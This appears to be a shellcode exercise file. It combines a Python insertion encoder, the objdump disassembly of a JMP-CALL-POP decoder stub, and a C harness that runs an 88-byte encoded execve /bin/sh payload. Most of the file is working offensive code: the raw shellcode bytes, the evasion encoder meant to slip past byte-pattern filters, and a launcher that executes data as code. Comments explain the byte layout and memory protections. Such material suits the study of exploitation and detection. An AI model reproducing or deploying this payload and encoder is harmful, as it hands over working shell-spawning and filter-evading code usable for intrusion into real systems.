/*
'''
; Date: 07/03/2019
; Insertion-Encoder.asm
; Author: Daniele Votta
; Description: This program encodes shellcode with the insertion technique (0xAA).
; Tested on: i686 GNU/Linux
'''
#!/usr/bin/python
# Python Insertion Encoder
import random
# Execve /bin/sh (25 bytes)
shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""
print 'Encoded shellcode...'
for x in bytearray(shellcode):
# Insertion Encoding
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x%02x' % 0xAA
# encoded += '\\x%02x' % random.randint(1,255)
encoded2 += '0x'
encoded2 += '%02x,' % x
encoded2 += '0x%02x,' % 0xAA
# encoded2 += '0x%02x' % random.randint(1,255)
print encoded +"\n"
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
*/
#include<stdio.h>
#include<string.h>
/*
; Insertion-Decoder.asm
; Author: Daniele Votta
; Description: This program decodes shellcode encoded with the insertion technique (0xAA).
; Tested on: i686 GNU/Linux
; Shellcode Length:50
; JMP | CALL | POP | Techniques
Insertion-Decoder: file format elf32-i386
Disassembly of section .text:
08048080 <_start>:
8048080: eb 1d jmp 804809f <call_decoder>
08048082 <decoder>:
8048082: 5e pop esi
8048083: 8d 7e 01 lea edi,[esi+0x1]
8048086: 31 c0 xor eax,eax
8048088: b0 01 mov al,0x1
804808a: 31 db xor ebx,ebx
0804808c <decode>:
804808c: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
804808f: 80 f3 aa xor bl,0xaa
8048092: 75 10 jne 80480a4 <EncodedShellcode>
8048094: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
8048098: 88 1f mov BYTE PTR [edi],bl
804809a: 47 inc edi
804809b: 04 02 add al,0x2
804809d: eb ed jmp 804808c <decode>
0804809f <call_decoder>:
804809f: e8 de ff ff ff call 8048082 <decoder>
080480a4 <EncodedShellcode>:
80480a4: 31 aa c0 aa 50 aa xor DWORD PTR [edx-0x55af5540],ebp
80480aa: 68 aa 2f aa 2f push 0x2faa2faa
80480af: aa stos BYTE PTR es:[edi],al
80480b0: 73 aa jae 804805c <_start-0x24>
80480b2: 68 aa 68 aa 2f push 0x2faa68aa
80480b7: aa stos BYTE PTR es:[edi],al
80480b8: 62 aa 69 aa 6e aa bound ebp,QWORD PTR [edx-0x55915597]
80480be: 89 aa e3 aa 50 aa mov DWORD PTR [edx-0x55af551d],ebp
80480c4: 89 aa e2 aa 53 aa mov DWORD PTR [edx-0x55ac551e],ebp
80480ca: 89 aa e1 aa b0 aa mov DWORD PTR [edx-0x554f551f],ebp
80480d0: 0b aa cd aa 80 aa or ebp,DWORD PTR [edx-0x557f5533]
80480d6: bb .byte 0xbb
80480d7: bb .byte 0xbb
[+] Extract Shellcode ...
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb"
======================= POC Daniele Votta =======================
*/
/* Insertion Encoded Execve /bin/sh (88 bytes) */
/*
 * Byte layout, per the objdump listing above (88 bytes total):
 *   [0..35]   decoder stub: jmp/call/pop locates the payload, then walks it
 *             in steps of two, copying the byte that follows each 0xaa
 *             marker back over the buffer (it writes into its own region,
 *             see "mov BYTE PTR [edi],bl" in the listing);
 *   [36..85]  the 25-byte execve payload with 0xaa inserted after each byte;
 *   [86..87]  0xbb 0xbb -- the first non-0xaa marker, which makes the
 *             decoder's jne branch to the now-decoded payload.
 * Keep this array NUL-free: main() reports its size with strlen(), which
 * would stop early at a 0x00 byte.
 */
unsigned char code[] = \
"\xeb\x1d\x5e\x8d\x7e\x01\x31\xc0\xb0\x01\x31\xdb\x8a\x1c\x06\x80\xf3\xaa\x75\x10\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xe8\xde\xff\xff\xff\x31\xaa\xc0\xaa\x50\xaa\x68\xaa\x2f\xaa\x2f\xaa\x73\xaa\x68\xaa\x68\xaa\x2f\xaa\x62\xaa\x69\xaa\x6e\xaa\x89\xaa\xe3\xaa\x50\xaa\x89\xaa\xe2\xaa\x53\xaa\x89\xaa\xe1\xaa\xb0\xaa\x0b\xaa\xcd\xaa\x80\xaa\xbb\xbb";
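/*
 * Test harness: prints the length of the embedded byte array and then
 * transfers control to it through a function pointer.
 *
 * Notes:
 *  - strlen() returns size_t, so "%zu" is the matching conversion; the
 *    original "%d" was a format/argument mismatch (undefined behavior).
 *    The printed length is only meaningful because the array above
 *    contains no 0x00 byte.
 *  - The array is ordinary writable data. The indirect call (and the
 *    decoder's in-place writes) only proceed when that memory is also
 *    mapped executable; with non-executable data the call faults, which
 *    is the W^X protection doing its job.
 *  - Reaches "return 0" only if the payload returns; the execve payload
 *    described above does not return on success.
 */
int main(void)
{
	printf("Shellcode Length: %zu\n", strlen((const char *)code));
	/* Reinterpret the data array as code; a full prototype avoids the
	 * unspecified-argument function type of the original "int (*)()". */
	void (*ret)(void) = (void (*)(void))code;
	ret();
	return 0;
}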